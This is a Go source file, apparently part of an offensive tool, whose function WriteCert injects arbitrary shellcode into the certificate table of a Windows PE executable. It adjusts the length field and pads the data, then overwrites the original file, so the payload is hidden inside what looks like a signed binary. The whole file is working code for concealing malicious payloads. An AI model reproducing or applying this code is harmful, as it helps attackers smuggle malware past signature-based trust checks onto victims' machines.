package core

import (
	"bytes"
	"encoding/binary"
	"github.com/Binject/debug/pe"
	"os"
)

func WriteCert(path string, shellcode []byte) error {
	f, err := pe.Open(path)
	if err != nil {
		return err
	}
	data := f.CertificateTable
	var length uint32
	byteBuffer := bytes.NewBuffer(data[0:4])
	err = binary.Read(byteBuffer, binary.LittleEndian, &length)
	if err != nil {
		return err
	}
	data = append(data, shellcode...)
	length += uint32(len(shellcode))
	l := 8 - length%8
	if l > 0 {
		padding := make([]byte, l)
		for i := 0; i < int(l); i++ {
			padding[i] = 0x00
		}
		data = append(data, padding...)
		length += l
	}
	bBuf := new(bytes.Buffer)
	err = binary.Write(bBuf, binary.LittleEndian, &length)
	data = append(bBuf.Bytes(), data[4:]...)

	f.CertificateTable = data
	err = f.WriteFile(path + ".bak")
	if err != nil {
		return err
	}
	f.Close()
	err = os.Remove(path)
	if err != nil {
		return err
	}
	err = os.Rename(path+".bak", path)
	return err
}
